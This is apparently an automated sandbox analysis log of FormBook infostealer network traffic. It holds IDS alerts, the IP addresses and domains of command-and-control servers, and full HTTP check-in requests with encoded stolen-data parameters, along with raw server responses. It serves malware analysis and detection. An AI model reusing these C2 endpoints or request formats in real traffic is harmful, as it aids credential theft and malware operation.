                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49726 -> 64.190.62.22:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49728 -> 64.190.62.22:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49729 -> 104.21.63.135:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49730 -> 104.21.63.135:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49732 -> 104.21.63.135:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49733 -> 49.0.230.183:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49734 -> 49.0.230.183:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49736 -> 49.0.230.183:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49737 -> 66.29.152.141:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49738 -> 66.29.152.141:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49740 -> 66.29.152.141:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49741 -> 192.64.119.184:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49742 -> 192.64.119.184:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49744 -> 192.64.119.184:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49745 -> 87.236.19.107:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49746 -> 87.236.19.107:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49748 -> 87.236.19.107:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49749 -> 154.7.21.55:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49750 -> 154.7.21.55:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49752 -> 154.7.21.55:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49753 -> 50.6.160.34:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49754 -> 50.6.160.34:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49756 -> 50.6.160.34:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49757 -> 103.197.25.241:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49758 -> 103.197.25.241:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49760 -> 103.197.25.241:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49761 -> 89.31.143.90:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.10:49762 -> 89.31.143.90:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.10:49764 -> 89.31.143.90:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.nikazo.xyz
                Source: Joe Sandbox ViewIP Address: 87.236.19.107 87.236.19.107
                Source: Joe Sandbox ViewIP Address: 103.197.25.241 103.197.25.241
                Source: Joe Sandbox ViewIP Address: 64.190.62.22 64.190.62.22
                Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                Source: Joe Sandbox ViewASN Name: BEGET-ASRU BEGET-ASRU
                Source: Joe Sandbox ViewASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
                Source: Joe Sandbox ViewASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
                Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=ptLjcD60OGLEAEKwUIEQaugGR9tSXE/bjIUNt3iL6Qw6jfpYmMXFU+LQzVNpETLyO7HgKKKoK0NH56hBGNACCL/xDZHnLmeKZtapvr1OSuWcevHuIw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.cqyh.oneConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=CBgiEcAQTvmtp6KW0R4Z7j3tS9oH+Sd4wWgtDPe8rtmYg/trD2DMciPVEqfGjRspk89YWIqewcapqz5yHVGzQ5KlflxjVuoMuuz+sMTok+5fFnqu2w==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.d4ffo73dz.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=9Ok63Zp3UlyeFJncTpLan6F7UfPHzm35fZEpdutLQ03GKmXAn6TmeK19kU+o3seWSyf9rIWEGfMs+8v+auRJ5uWoro43dFLf6YZQGlVbKlE3Xt0YSA==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.appmystartup.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=u61FFSswTsQwZHK5Df1sdB0Y128x+tID5YHOMFlYU8e6X6f1CT0d10xaq3wUYzHCl9vsukjaIczYmr5kws9YFzoUz2fAyAt1utXToSD7Y3kRqMygPw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.hondamechanic.todayConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=2Kfb+Brrh9GrmqPqLtRK/jRr6sBFjt1I8ubTlYZTytp88LF+iTgF/zqvnUYpIzG87louehFzf7+JPcLVzBlhDb38gBs1IrPZ/tUzM/hN1wjivuIhpg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.oc7o0.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=nPkHDMcb1JQH2fM03fg+aIDrHSSiblzQLJDfzfVFS5dXE5xkefwXFeSdKwFU7agvUteWFQW2j0bTvqR9HNEHAhnYAdzU3M7ag8PlDKnWcqNy6jrKrg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mgn.icuConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=fK5JMP1eyt4jdSIw5YXXC01WYkEietwRjqQFc45Aj4a+GaPHnYBED0rkUElBfcfrwtDI0snSXtvXktZSmOPgjr2IHnyFN7VJ42KSbRcfuNaQ+9lGPw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nikazo.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=agiyDRT46qDSSmihlQ4LWL8xIgO+qfSg1vPRp09QaQzBVRWpSaW3tusYt1FhFwISNvV57xmnsnPpxHCL/G4hmICdRu2qyIf5a9CtW3wt0Qkcp+tj5w==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.605alibahis.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=qjLanAtLSG+g6YhcGMXKobFEDsC37gbqnajlfmukJF4TH11e5HWV02203YM0+S2fdiE5dYRNrz4LXrhHAApVOWSTzQMTxIdRoLo0SBW6YGOyo1TtwQ==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.pro-ecoproduct.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=kzp/a47TZoeooijf6PAMz/PnwNMdJTtRUuOJK4qo3trrvBMD8vtq5KxCd9qMSTo59iVH98TL2IBESMiQybod0ACy6WBPglHFi3698tluOY189mrwzA==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.supportstuiwords.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=1UUYHFL4LdVgOiboeMjc0IWbZOVr8VDrWpD/OUuuls53JWREudPDYQ+nxzsCxMG6BUvSIs7k/B5ZpvZv05F76qqNcXO9IRc03t2/8HV/ry1cldLuRw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.syscomputerrd.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=0vI33Q4NEpmtOF7zniUBuj/B9uVSpeQXctuTHh1MPiMb1OOu6LKWAuvExYXMr2bPJ/7wAe8CJHHvd3UWKZqUB7/Hcv68Qi5JcHFgKGRsF2oedTZ7pw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.dxgsf.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e6xn/?bvOt=I+7uQ1p9U2QgrZ2LiZBQD/xPqYJdH7KI3wBT7UIkgW5Aog6q3Z2jXuQC4TUh/9LTZ7Sd+JF5RXm6MN/mwd+CmdOx0GtGi60mugQ+ypEmsJunmkEeVg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.le-kuk.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: crossorigin="anonymous"></script> </head><body class="error404 custom-background wp-embed-responsive theme-flash everest-forms-no-js woocommerce-no-js hfeed header-sticky left-logo-right-menu"><div id="preloader-background"><div id="spinners"><div id="preloader"> <span></span> <span></span> <span></span> <span></span> <span></span></div></div></div><div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Saltar al contenido</a><header id="masthead" class="site-header" role="banner"><div class="header-top"><div class="tg-container"><div class="tg-column-wrapper clearfix"><div class="left-content"><ul class="contact-info"><li><i class="fa fa-map-marker"></i>Santo Domingo RD</li><li><i class="fa fa-phone"></i>849-250-5089</li><li><i class="fa fa-envelope"></i>syscomputerrd@gmail.com</li></ul></div><div class="right-content"><div class="menu-social-container"><ul id="menu-social" class="social-menu"><li id="menu-item-635" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-635"><a href="https://www.facebook.com/syscomputerrd"><span class="screen-reader-text">facebook</span></a></li><li id="menu-item-639" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-639"><a href="https://www.instagram.com/sys_computer/"><span class="screen-reader-text">instagram</span></a></li><li id="menu-item-640" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-640"><a href="https://www.youtube.com/channel/UCz92hpqzrnHultxRscMZ5pQ"><span class="screen-reader-text">YOUTUBE</span></a></li></ul></div></div></div></div></div><div class="header-bottom"><div class="tg-container"><div class="logo"><div class="logo-text site-branding"><p class="site-title"><a href="https://hzw.avt.temporary.site/" rel="home">MOVIMIENTO JUVENTUD COMUNITARIA</a></p></div></div><div class="site-navigation-wrapper"><nav id="site-navigation" class="main-navigation" role="navigation"><div class="menu-toggle"> <i class="fa fa-bars"></i></div><div class="menu-menu-container"><ul id="primary-menu" class="menu"><li id="menu-item-741" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-741"><a href="https://hzw.avt.temporary.site/">Inicio</a></li><li id="menu-item-748" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-748"><a href="https://hzw.avt.temporary.site/blog-4/">Movimiento JC</a></li><li id="menu-item-737" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-737"><a href="https://hzw.avt.temporary.site/contact/">Contact</a></li></ul></div></nav></div><div class="header-action-container"><div class="cart-wrap"><div class="flash-cart-views"> <a href="https://hzw.avt.temporary.site/cart/" class="wcmenucart-contents"> <i class="fa fa-opencart"></i> <span class="cart-value">0</span> </a></div><div class="widget woocommerce widget_shopping_cart"><h2 class="widgettitle">Carrito</h2><div class="widget_shopping_cart_content"></div><
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: crossorigin="anonymous"></script> </head><body class="error404 custom-background wp-embed-responsive theme-flash everest-forms-no-js woocommerce-no-js hfeed header-sticky left-logo-right-menu"><div id="preloader-background"><div id="spinners"><div id="preloader"> <span></span> <span></span> <span></span> <span></span> <span></span></div></div></div><div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Saltar al contenido</a><header id="masthead" class="site-header" role="banner"><div class="header-top"><div class="tg-container"><div class="tg-column-wrapper clearfix"><div class="left-content"><ul class="contact-info"><li><i class="fa fa-map-marker"></i>Santo Domingo RD</li><li><i class="fa fa-phone"></i>849-250-5089</li><li><i class="fa fa-envelope"></i>syscomputerrd@gmail.com</li></ul></div><div class="right-content"><div class="menu-social-container"><ul id="menu-social" class="social-menu"><li id="menu-item-635" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-635"><a href="https://www.facebook.com/syscomputerrd"><span class="screen-reader-text">facebook</span></a></li><li id="menu-item-639" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-639"><a href="https://www.instagram.com/sys_computer/"><span class="screen-reader-text">instagram</span></a></li><li id="menu-item-640" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-640"><a href="https://www.youtube.com/channel/UCz92hpqzrnHultxRscMZ5pQ"><span class="screen-reader-text">YOUTUBE</span></a></li></ul></div></div></div></div></div><div class="header-bottom"><div class="tg-container"><div class="logo"><div class="logo-text site-branding"><p class="site-title"><a href="https://hzw.avt.temporary.site/" rel="home">MOVIMIENTO JUVENTUD COMUNITARIA</a></p></div></div><div class="site-navigation-wrapper"><nav id="site-navigation" class="main-navigation" role="navigation"><div class="menu-toggle"> <i class="fa fa-bars"></i></div><div class="menu-menu-container"><ul id="primary-menu" class="menu"><li id="menu-item-741" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-741"><a href="https://hzw.avt.temporary.site/">Inicio</a></li><li id="menu-item-748" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-748"><a href="https://hzw.avt.temporary.site/blog-4/">Movimiento JC</a></li><li id="menu-item-737" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-737"><a href="https://hzw.avt.temporary.site/contact/">Contact</a></li></ul></div></nav></div><div class="header-action-container"><div class="cart-wrap"><div class="flash-cart-views"> <a href="https://hzw.avt.temporary.site/cart/" class="wcmenucart-contents"> <i class="fa fa-opencart"></i> <span class="cart-value">0</span> </a></div><div class="widget woocommerce widget_shopping_cart"><h2 class="widgettitle">Carrito</h2><div class="widget_shopping_cart_content"></div><
                Source: unknownDNS traffic detected: queries for: www.cqyh.one
                Source: unknownHTTP traffic detected: POST /e6xn/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-USHost: www.d4ffo73dz.sbsContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 193Origin: http://www.d4ffo73dz.sbsReferer: http://www.d4ffo73dz.sbs/e6xn/User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 62 76 4f 74 3d 50 44 49 43 48 71 78 2f 4e 49 50 58 6f 5a 4f 52 38 6a 35 57 37 6a 58 56 59 74 39 76 31 57 70 49 2f 32 4d 6c 45 73 65 53 67 4b 4f 43 6a 4e 6b 59 44 68 62 48 53 58 48 45 45 5a 62 72 6c 52 77 4d 34 5a 6f 48 53 4a 69 35 79 62 36 68 39 46 31 31 4e 6d 6d 36 61 74 4b 2b 41 77 38 6a 55 65 78 6c 6d 73 6e 4c 6a 72 7a 74 6f 4d 55 48 47 47 57 43 71 52 59 41 66 72 73 72 6f 47 59 42 43 41 42 69 30 35 41 4b 61 66 30 73 4b 73 4f 33 44 33 72 35 51 34 41 6a 75 77 62 50 4e 38 6e 34 38 4e 58 52 47 35 66 30 35 59 63 7a 77 42 74 30 2f 4c 46 53 75 36 51 53 75 48 69 4c 54 4c 76 35 Data Ascii: bvOt=PDICHqx/NIPXoZOR8j5W7jXVYt9v1WpI/2MlEseSgKOCjNkYDhbHSXHEEZbrlRwM4ZoHSJi5yb6h9F11Nmm6atK+Aw8jUexlmsnLjrztoMUHGGWCqRYAfrsroGYBCABi05AKaf0sKsO3D3r5Q4AjuwbPN8n48NXRG5f05YczwBt0/LFSu6QSuHiLTLv5
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: kangle/3.5Date: Mon, 18 Mar 2024 13:46:06 GMTContent-Type: text/html; charset=utf-8X-Cache: MISS from kangle web serverContent-Length: 985Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 27 6d 61 69 6e 27 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 3c 69 3e 3c 68 32 3e 53 6f 6d 65 74 68 69 6e 67 20 65 72 72 6f 72 3a 3c 2f 68 32 3e 3c 2f 69 3e 0a 3c 70 3e 3c 68 33 3e 34 30 34 3c 2f 68 33 3e 3c 68 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 27 72 65 64 27 3e 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 2e 3c 2f 66 6f 6e 74 3e 3c 2f 68 33 3e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 6f 72 20 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 27 3e 74 72 79 20 61 67 61 69 6e 3c 2f 61 3e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 64 69 76 3e 68 6f 73 74 6e 61 6d 65 3a 20 6b 61 6e 67 6c 65 20 77 65 62 20 73 65 72 76 65 72 3c 2f 64 69 76 3e 3c 68 72 3e 0a 3c 64 69 76 20 69 64 3d 27 70 62 27 3e 47 65 6e 65 72 61 74 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 6f 64 65 3d 34 30 34 27 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 6b 61 6e 67 6c 65 2f 33 2e 35 2e 32 31 2e 31 36 3c 2f 61 3e 2e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 27 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 09 76 61 72 20 72 65 66 65 72 65 72 20 3d 20 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 09 76 61 72 20 75 72 6c 20 3d 20 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 55 52 4c 29 3b 0a 09 76 61 72 20 6d 73 67 20 3d 20 27 4e 6f 25 32 30 73 75 63 68 25 32 30 66 69 6c 65 25 32 30 6f 72 25 32 30 64 69 72 65 63 74 6f 72 79 2e 27 3b 0a 20 20 20 20 76 61 72 20 68 6f 73 74 6e 61 6d 65 3d 27 6b 61 6e 67 6c 65 20 77 65 62 20 73 65 72 76 65 72 27 3b 0a 09 76 61 72 20 65 76 65 6e 74 5f 69 64 3d 27 27 3b 0a 09 76 61 72 20 61 61 61 61 61 61 61 20 3d 20 28 27 3c 73 63 72 27 2b 27 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 65 72 72 6f 72 2e 6b 61 6e 67 6c 65 77 65 62 2e 6e 65 74 2f 3f 63 6f 64 65 3d 34 30 34 26 76 68 3d 76 68 73 61 35 37 36 39 38 22 3e 3c 2f 73 63 72 27 20 2b 20 27 69 70 74 3e 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 21 2d 2d 20 70 61 64 64 69 6e 67 20 66 6f 72 20 69 65 20 2d 2d 3e 3c 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1163date: Mon, 18 Mar 2024 13:46:38 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 